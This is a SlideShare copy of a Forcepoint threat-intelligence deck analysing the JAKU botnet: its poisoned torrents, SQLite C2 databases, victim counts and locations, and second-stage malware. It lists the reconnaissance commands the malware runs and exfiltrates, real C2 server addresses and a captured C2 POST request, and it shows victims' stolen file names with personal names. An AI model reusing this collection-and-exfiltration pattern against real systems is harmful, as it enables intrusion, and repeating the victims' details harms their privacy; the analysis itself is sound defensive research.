SlideShare a Scribd company logo

JAKU Botnet Analysis

Napier University
Napier University

Forcepoint analyzed the JAKU botnet and found: - The botnet primarily targeted victims in Korea, Japan, and China and used SQLite databases to manage over 20,000 infected devices. - It distributed malware through poisoned BitTorrent files and its command and control infrastructure had resilient channels. - The malware exfiltrated system information, network information, browser history and files from victims, which were primarily personal computers rather than from corporations. - Victim locations were mapped and found to be concentrated in urban areas in Korea, Japan, and parts of Asia and Europe. The number of victims grew rapidly over time.

Education
1 of 29
Download to read offline
Copyright © 2016 Forcepoint. All rights reserved. JAKU – Analysis of a Botnet Andy Settle Head of Special Investigations
Copyright © 2016 Forcepoint. All rights reserved. | 2 SPECIAL INVESTIGATIONS “We inform and shape the understanding of the decision influencers and decision makers around the use of our services. We create a credible value proposition for 'why Forcepoint', we are a discriminator for our Customers when they may look elsewhere.” “We add value in difficult circumstances. If a Customer is under a spear phishing attack and wants to know what the intent is, we are here to do the analysis. When a customers is informed that they have been breached we can help provide high quality actionable intelligence to those responsible for responding to the incident.” “At times, we perform the activities that are too sensitive, too complicated, too complex, too time-consuming and occasionally, just too weird for others.”
Copyright © 2016 Forcepoint. All rights reserved. | 3Copyright © 2016 Forcepoint. All rights reserved. | 3 JAKU- Analysis of a Botnet
Copyright © 2016 Forcepoint. All rights reserved. | 4 JAKU – HEADLINES Piracy. The prevalence of users/victims who are running counterfeit installations of Microsoft Windows®, downloading ‘warez’ software and using BitTorrent software to illegally obtain these as well as other copyright protected material, such as movies and music. C2 Databases. The use of SQLite files to collate and manage the botnet members, their structure and the use of version numbering. Poisoned BitTorrents. The technique of threat actors deploying torrent files onto torrent sites that are pre-infected with malware has not been widely seen before, especially with respect to BitTorrent-types of attack. This behaviour is difficult to trace and track and is indiscriminate in its infection pattern unless it has some means of targeting desired demographics. Resilient C2 Channels. Stage two of one piece of malware has three inbuilt Command and Control (C2) mechanisms. This level of resilience is not accidental, but rather, such investment and effort is usually indicative of the perceived value of the target. High Value Targets. Within the noise of thousands of seemingly indiscriminate botnet victims, the JAKU campaign performs a separate, highly targeted operation. TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 5 LOOKING FOR BAD THINGS… Index of /img Icon Name Last modified Size Description ___________________________________________________________________________________________________________ [DIR] Parent Directory [IMG] near.jpg 09-Dec-2015 19:59 451M ___________________________________________________________________________________________________________ Apache/2.2.21 (Unix) DAV/2 mod_ssl/2.2.21 OpenSSL/1.0.0c PHP/5.3.8 mod_apreq2-20090110/2.7.1 mod_perl/2.0.5 Perl/v5.10.1 Server at pic3.mooo.com Port 80 TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 6 …SEEK, AND YE SHALL FIND? $ file near.jpg near.jpg: SQLite 2.x database $ sqlite near.jpg .schema CREATE TABLE child (uid TEXT PRIMARY KEY, version REAL, pip TEXT, info TEXT, infouptime INTEGER, iplist TEXT, instime INTEGER,lasttime INTEGER, downfile TEXT, downver REAL); CREATE TABLE dist2 (id INTEGER PRIMARY KEY, pubdownfile TEXT, pubdownver REAL, pubdowncnt INTEGER, pridownfile TEXT, pridownver REAL, pridowncnt INTEGER); CREATE TABLE history (id INTEGER PRIMARY KEY, uid TEXT, ctime INTEGER); CREATE TABLE tvdist (id INTEGER PRIMARY KEY, tvdownfile TEXT, tvdownver REAL, tvdowncnt INTEGER); CREATE INDEX idx_instime ON child(instime); CREATE INDEX idx_lasttime ON child(lasttime); CREATE INDEX idx_version ON child(version); TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 7 DOCUMENTING THE FINDINGS COLUMN DESCRIPTION UID A unique identifier of the victim. This allows the C2 server to track victims if and when their IP address changes. VERSION A unique identifier for the version of the malware on the victim machine. PIP The public IP address of the victim. This is updated as and when the victim machines external IP address changes. INFO The details gathered by the malware from the victim machine. INFOUPTIME The date/time that the INFO field was updated in the database. Believed to be the data/time on the C2 server. IPLIST A list of IP addresses from all the victim machines network interfaces. INSTIME The date/time that the malware was originally installed on the victim machine. LASTTIME The date/time of the last beacon received by the C2 server from the malware on the victim machine. TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 8 EXAMPLE DATA - SYSTEMINFO TLP - WHITE Host Name: *********-PC OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: ********* Registered Organization: Product ID: 00426-292-0000007-85307 Original Install Date: 12/24/2014, 2:53:55 PM System Boot Time: 5/1/2015, 9:00:02 AM System Manufacturer: Hewlett-Packard System Model: HP EliteBook 8530p System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 6 Model 23 BIOS Version: Hewlett-Packard 68PDV Ver. F.11 Windows Directory: C:Windows System Directory: C:Windowssystem32 Boot Device: DeviceHarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC+05:00) Islamabad, Karachi Total Physical Memory: 1,978 MB Available Physical Memory: 970 MB Virtual Memory: Max Size: 3,957 MB Virtual Memory: Available: 2,406 MB Virtual Memory: In Use: 1,551 MB Page File Location(s): C:pagefile.sys Domain: ********** Logon Server: *********-dC ホスト名: LENOVO-PC OS 名: Microsoft Windows 10 Home OS バージョン: 10.0.10586 N/A ビルド 10586 OS 製造元: Microsoft Corporation OS 構成: スタンドアロン ワークステーション OS ビルドの種類: Multiprocessor Free 登録されている所有者: 123 登録されている組織: プロダクト ID: 00326-10000-00000-AA381 最初のインストール日付: 2016/02/22, 11:02:21 システム起動時間: 2016/04/23, 17:46:45 システム製造元: LENOVO システム モデル: 20C5CTO1WW システムの種類: x64-based PC プロセッサ: 1 プロセッサインストール済みです。 [01]: Intel64 Family 6 Model 60 Stepping BIOS バージョン: LENOVO J9ET93WW (2.13 ), 2014/08/29 Windows ディレクトリ: C:WINDOWS システム ディレクトリ: C:WINDOWSsystem32 起動デバイス: DeviceHarddiskVolume2 システム ロケール: ja;日本語 入力ロケール: ja;日本語 タイム ゾーン: (UTC+09:00) 大阪、札幌、東京 物理メモリの合計: 3,987 MB 利用できる物理メモリ: 1,157 MB 仮想メモリ: 最大サイズ: 5,671 MB 仮想メモリ: 利用可能: 2,848 MB 仮想メモリ: 使用中: 2,823 MB ページ ファイルの場所: C:pagefile.sys ドメイン: ***** ログオン サーバー: ****
Copyright © 2016 Forcepoint. All rights reserved. | 9 EXAMPLE DATA - PROCESSES AND FILES Image Name PID Services ========================= ======== ========================== System Idle Process 0 N/A System 4 N/A smss.exe 232 N/A ... winlogon.exe 456 N/A services.exe 500 N/A lsass.exe 516 KeyIso, SamSs lsm.exe 524 N/A svchost.exe 636 DcomLaunch, PlugPlay, Power svchost.exe 708 RpcEptMapper, RpcSs ... explorer.exe 2348 N/A hpwuschd2.exe 2448 N/A HPStatusAlerts.exe 2464 N/A Skype.exe 2488 N/A SSScheduler.exe 2504 N/A SearchIndexer.exe 3132 WSearch chrome.exe 3416 N/A svchost.exe 3440 FontCache, SSDPSRV, upnphost ... chrome.exe 4028 N/A chrome.exe 2248 N/A svchost.exe 2560 WinDefend ... taskeng.exe 608 N/A Services.exe 1408 N/A WmiPrvSE.exe 2176 N/A WmiPrvSE.exe 3088 N/A TrustedInstaller.exe 3832 TrustedInstaller TVC15.exe 3780 N/A conhost.exe 3284 N/A tasklist.exe 2872 N/A Hollywood Sex Wars.2013.720p.KOR.HDRip.H264-KTH Honeycam 2015-09-24 23-57-13 Hotaru.No.Hikari.The.Movie.2012.JAP.BDRip.x264.AC3- ADiOS Hotel.Transylvania.2012.1080p.BluRay.H264.AAC-RARBG House.of.Tolerance.201.KORSUB.x264.AC3-ADiOS 亞裔美少女被老外狂舔騷B各種姿勢狂幹加口暴指插肛門高清超長視頻 出租房露脸干成都骚货 國內騷妻艷舞自拍好身材扭的真風騷扭玩再吹簫真刺激超清 KWANGHO Passport NOORI Passport passport ID.pdf Astaneh Passport.pdf Passport Goudarzi.png Passport Rastegar.jpg Passport Taghizadeh.pdf Passport Taheri.jpg PASSPORT_LEEJAEYOUNG.jpg Ling Yok Ung Passport My Passport (F) 2015 DPRK Funding with comments DPRK 260615.doc Color coded DPRK Proposal to ****** 2016 - 2018-DM DPRK DL workshop programme DAY One. docx DPRK 2016 funding Analysis Mar 2016.xlsx TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 10 FIRST STAGE - WHAT INFORMATION IS EXFILTRATED? systeminfo net use net user tasklist /svc netstat –ano dir "%USERPROFILE%Recent“ dir "%APPDATA%MicrosoftWindowsRecent“ dir /s/b "%USERPROFILE%Favorites" TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 11 PIVOTING VIA WHAT WE NOW KNOW C2 IP ASN VICTIMS BLACK-SAPHARUS 101.99.68.5 AS45839 PIRADIUS NET 5153 BLUE-MONKEY 43.252.36.195 AS45144 Net Onboard Sdn Bhd - Quality & Reliable Cloud Hosting Provider 3925 BROWN-COOPER 103.13.229.20 AS23884 Proimage Engineering and Communication Co.,Ltd. 1184 GREEN-SOUNDFIX 27.254.44.207 AS9891 CS LOXINFO Public Company Limited. 327 GREY-THAI 202.142.223.144 AS7654 Internet Solution & Service Provider Co., Ltd. 3005 ORANGE-HOWL 27.254.96.222 AS9891 CS LOXINFO Public Company Limited. 4204 PINK-COW 27.254.55.23 AS9891 CS LOXINFO Public Company Limited. 2242 RED-RACCOON ] REDACTED [ AS45144 Net Onboard Sdn Bhd - Quality & Reliable Cloud Hosting Provider 10 RED-RACCOON ] REDACTED [ AS24218 Global Transit Communications - Malaysia 17 RED-RACCOON ] REDACTED [ AS23884 Proimage Engineering and Communication Co.,Ltd. 10 VIOLET-FOX 27.254.96.223 AS9891 CS LOXINFO Public Company Limited. 1187 YELLOW-BOA 202.150.220.93 AS38001 NewMedia Express Pte Ltd. Singapore Web Hosting Service Provider 3236 TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 12 DATA LOCATIONS & VICTIM COUNT TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 13 TOTAL NUMBER OF VICTIMS PER SERVER 0 1000 2000 3000 4000 5000 6000 Oct/2015 Nov/2015 Dec/2015 Jan/2016 Feb/2016 Mar/2016 Apr/2016 BLACK-SAPHARUS BROWN-COOPER GREY-THAI YELLOW-BOA RED-RACOON GREEN-SOUNDFIX PINK-COW ORANGE-HOWL VIOLET-FOX BLUE-MONKEY TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 14 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 04/10/2015 04/11/2015 04/12/2015 04/01/2016 04/02/2016 04/03/2016 04/04/2016 COUNTING THE NUMBER OF VICTIMS TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 15 WHAT DO WE KNOW ABOUT THE VICTIMS? Korea 42% Japan 31% China 9% US 6% OTHERS 12% Victims Countries Korean 43% Japanese 30% English 13% Chinese 10% OTHERS 4% Victim Languages TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 16 VICTIMS LOCATIONS – AMERICAS & EMEA TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 17 VICTIM LOCATIONS - APAC TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 18 VICTIMS LOCATIONS – KOREA & JAPAN TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 19 VICTIMS LOCATIONS – RUSSIA TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 20 CORPORATE VICTIMS & DWELL TIMES Corporate Victims Amongst the JAKU victims the number of corporate victims is significantly low. The proportion of victim computers that are a member of a Microsoft Windows domain, rather than workgroups or as standalone systems is less than 1% of all victims. This is calculated on 153 unique victims matching the corporate criteria. Dwell Time. The length of time a botnet victim is infected for is referred to as the dwell time. For those identified as corporate victims the mean dwell time is 93 days with the maximum observed being 348 days. For the non- corporate the figures vary wildly and in a number of cases the systems appear to be either re-infected or are infected by a number of variants (versions) of the malware. TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 21 COUNTERFEIT WINDOWS INSTALLATIONS When an Original Equipment Manufacturer (such as DELL and HP) install Microsoft Windows onto a new computer they use what is known as an OEM product ID (PID). These PID can be identified from retail ones as they contain the text “OEM“. In cases where Windows reports that the ‘model’ of the computer is ‘To be filled by O.E.M.’ and the PID contains OEM it indicates with some a)reasonable certainty, that OEM product license has been used on non OEM hardware. In other words, the system is running a counterfeit Microsoft Windows license. With this in mind, the total number of OEM PIDs identified is 12243. The number appearing to be counterfeits is 6366. For OEM licenses this indicates that 52% are likely to be counterfeits. It is reasonable to assume that the ratio can be used to infer the prevalence of counterfeits across all the JAKU victim, i.e. including those with retail PIDs. Over half of the victim computers are running counterfeit copies of Microsoft Windows. According to an IDC study “Unlicensed Software and Cybersecurity Threats” (2015): “…a clear link between unlicensed software and cybersecurity threats…. For enterprises, governments, and consumers, the obvious implication is that one way to lower cybersecurity risks is to reduce the use of unlicensed software.” However, the evidence from JAKU paints a stronger message: Whereas the enterprise may well be operating correctly with the licensing of software, there are a sizable number of the online community who do not take the same approach and this behaviour presents a threat to us all. TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 22 2ND STAGE MALWARE – R2D3 $ file download.png download.png: PNG image data, 997393152 x 167848821, 152-bit TLP - WHITE Bad RC4 Encryption LZH – LZ Huffman compression algorithm Bitdefender – AV Detection Stealth Injection – ‘explorer.exe’ Service Installation Reverse Engineered to C Source Code
Copyright © 2016 Forcepoint. All rights reserved. | 23 SECURE FILE DELETION (REUSE) The file deletion routine has been taken and recoded from publicly available code Originally written by John Underhill, it was called ‘Secure File Shredder’ The routine used in the malware even contains the same coding errors made, where file are renamed 780 times (30 * 26) instead of the intended 30 The only difference is that the file truncation is only performed once in the malware, rather than 10 times as in Underhill's code The purpose of this code is to prevent advanced forensics techniques from being able to recover the deleted files Special Investigations contacted John who we must thank for his cooperation. TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 24 REUSE – UDT LIBRARIES (REUSE) As well as using DNS as a covert C2 channel, the malware uses an open source library called UDT as another of its three C2 channels. The authors likely chose the library in order to provide the flexibility of being able to use UDP for C2 communication, as well as being stealthy at the same time. The ability for malware to concurrently support three separate, custom built C2 channels is more advanced than the majority of malware currently observed. This offers insight into the amount of effort the malware author and actor(s) have expended to ensure that the malware is stealthy, and can remain in contact with its C2s, despite the network environment it may be running within. TLP - WHITE “UDT is a reliable UDP based application level data transport protocol for distributed data intensive applications over wide area high- speed networks. UDT uses UDP to transfer bulk data with its own reliability control and congestion control mechanisms. The new protocol can transfer data at a much higher speed than TCP does. UDT is also a highly configurable framework that can accommodate various congestion control algorithms.”
Copyright © 2016 Forcepoint. All rights reserved. | 25 2ND STAGE COMMAND AND CONTROL POST http://101.99.68.5/bbs/CaC.php HTTP/1.1 Content-Type: multipart/form-data; boundary=--HC-MPFD-BOUNDARY Content-Length: 320 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Host: 101.99.68.5 Proxy-Connection: Keep-Alive Pragma: no-cache TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 26 WEB LIBRARY (REUSE) TLP - WHITE
Copyright © 2016 Forcepoint. All rights reserved. | 27 KEY TAKE-AWAYS Copyright and Software Piracy Precision High Value Targeting Regionally Focused Targeting C2 Databases Resilient and Covert C2 Channels Reuse of Code & Secure Erasure TLP - WHITE
blogs.forcepoint.com
Copyright © 2016 Forcepoint. All rights reserved. | 29 Thank you! Andy Settle @iC3N1 http://blogs.forcepoint.com/security-labs/

Recommended

Base Metal Forensics
Base Metal ForensicsBase Metal Forensics
Base Metal Forensics
Napier University
 
Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE - ATT&CKcon
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
Lancope, Inc.
 
Supply Chain Attack Backdooring Your Networks
Supply Chain Attack Backdooring Your Networks Supply Chain Attack Backdooring Your Networks
Supply Chain Attack Backdooring Your Networks
Bangladesh Network Operators Group
 
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE - ATT&CKcon
 
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your RiskHow to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
SurfWatch Labs
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 

Recommended

Base Metal Forensics
Base Metal ForensicsBase Metal Forensics
Base Metal Forensics
Napier University
 
Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE - ATT&CKcon
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
Lancope, Inc.
 
Supply Chain Attack Backdooring Your Networks
Supply Chain Attack Backdooring Your Networks Supply Chain Attack Backdooring Your Networks
Supply Chain Attack Backdooring Your Networks
Bangladesh Network Operators Group
 
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE ATT&CKcon 2018: ATT&CK: All the Things, Neelsen Cyrus and David Thompso...
MITRE - ATT&CKcon
 
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your RiskHow to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
SurfWatch Labs
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Raffael Marty
 
What is Next-Generation Antivirus?
What is Next-Generation Antivirus?What is Next-Generation Antivirus?
What is Next-Generation Antivirus?
Ryan G. Murphy
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
Netpluz Asia Pte Ltd
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Supply chain-attack
Supply chain-attackSupply chain-attack
Supply chain-attack
vikram vashisth
 
Investigating, Mitigating and Preventing Cyber Attacks with Security Analytics
Investigating, Mitigating and Preventing Cyber Attacks with Security AnalyticsInvestigating, Mitigating and Preventing Cyber Attacks with Security Analytics
Investigating, Mitigating and Preventing Cyber Attacks with Security Analytics
IBMGovernmentCA
 
SOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCSOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOC
Priyanka Aash
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
APNIC
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware ly
Lisa Young
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
RootedCON
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Zero-Day Vulnerability and Heuristic Analysis
Zero-Day Vulnerability and Heuristic AnalysisZero-Day Vulnerability and Heuristic Analysis
Zero-Day Vulnerability and Heuristic Analysis
Ahmed Banafa
 
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
REVULN
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
Ramin Farajpour Cami
 
Gov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior AnalyticsGov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior Analytics
Splunk
 
Is Antivirus (AV) Dead or Just Missing in Action
Is Antivirus (AV) Dead or Just Missing in Action Is Antivirus (AV) Dead or Just Missing in Action
Is Antivirus (AV) Dead or Just Missing in Action
Quick Heal Technologies Ltd.
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Analyzing and implementing of network penetration testing
Analyzing and implementing of network penetration testingAnalyzing and implementing of network penetration testing
Analyzing and implementing of network penetration testing
Engr Md Yusuf Miah
 
Hosted Email Security Webinar
Hosted Email Security WebinarHosted Email Security Webinar
Hosted Email Security Webinar
Cyber Security Startup Klassify , ACPL Systems Pvt. Ltd.
 
GTE 2016
GTE 2016GTE 2016
GTE 2016
Juston E. Glass, MS, CPA
 

More Related Content

What's hot

Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Raffael Marty
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
RootedCON
 
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
REVULN
 

What's hot (20)

Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
Cyber Security Beyond 2020 – Will We Learn From Our Mistakes?
 
What is Next-Generation Antivirus?
What is Next-Generation Antivirus?What is Next-Generation Antivirus?
What is Next-Generation Antivirus?
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Supply chain-attack
Supply chain-attackSupply chain-attack
Supply chain-attack
 
Investigating, Mitigating and Preventing Cyber Attacks with Security Analytics
Investigating, Mitigating and Preventing Cyber Attacks with Security AnalyticsInvestigating, Mitigating and Preventing Cyber Attacks with Security Analytics
Investigating, Mitigating and Preventing Cyber Attacks with Security Analytics
 
SOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCSOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOC
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware ly
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Zero-Day Vulnerability and Heuristic Analysis
Zero-Day Vulnerability and Heuristic AnalysisZero-Day Vulnerability and Heuristic Analysis
Zero-Day Vulnerability and Heuristic Analysis
 
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
Gov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior AnalyticsGov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior Analytics
 
Is Antivirus (AV) Dead or Just Missing in Action
Is Antivirus (AV) Dead or Just Missing in Action Is Antivirus (AV) Dead or Just Missing in Action
Is Antivirus (AV) Dead or Just Missing in Action
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Analyzing and implementing of network penetration testing
Analyzing and implementing of network penetration testingAnalyzing and implementing of network penetration testing
Analyzing and implementing of network penetration testing
 

Viewers also liked

Expediente de atención a la diversidad
Expediente de atención a la diversidadExpediente de atención a la diversidad
Expediente de atención a la diversidad
Naifur
 
Rice University_Python_Part 2_Certificate
Rice University_Python_Part 2_CertificateRice University_Python_Part 2_Certificate
Rice University_Python_Part 2_Certificate
Wilfred Correia
 
Rice University_Python_Part 1_Certificate
Rice University_Python_Part 1_CertificateRice University_Python_Part 1_Certificate
Rice University_Python_Part 1_Certificate
Wilfred Correia
 
SucessfulInsiderThreat
SucessfulInsiderThreatSucessfulInsiderThreat
SucessfulInsiderThreat
HammerNJ
 
Senior Finance SG pages
Senior Finance SG pagesSenior Finance SG pages
Senior Finance SG pages
Emma Boffo
 

Viewers also liked (19)

Hosted Email Security Webinar
Hosted Email Security WebinarHosted Email Security Webinar
Hosted Email Security Webinar
 
GTE 2016
GTE 2016GTE 2016
GTE 2016
 
Actividades+de+ampliación+y+refuerzo+lengua+castellana+2º+eso
